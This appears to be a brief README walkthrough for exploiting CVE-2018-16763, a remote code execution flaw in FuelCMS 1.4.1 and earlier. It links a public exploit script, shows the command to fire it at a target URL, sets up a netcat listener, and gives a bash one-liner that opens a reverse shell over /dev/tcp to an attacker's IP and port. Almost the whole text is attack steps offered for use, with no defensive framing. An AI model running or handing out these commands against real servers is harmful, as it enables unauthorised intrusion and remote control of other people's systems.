README.md

FuelCMS - CVE-2018-16763

Requirements

• FuelCMS version <= 1.4.1

Exploitation

Download the exploit

https://www.exploit-db.com/exploits/50477

Trigering the exploit

python exploit.py -u http://TARGET/ 

Setting up a netcat listener

nc -lvnp [PORT]

Get a stabilized shell

echo "sh -i >& /dev/tcp/[IP ADRESS]/[PORT] 0>&1" > /tmp/shell.sh; bash /tmp/shell.sh

References

• https://www.getfuelcms.com/
• https://www.exploit-db.com/exploits/50477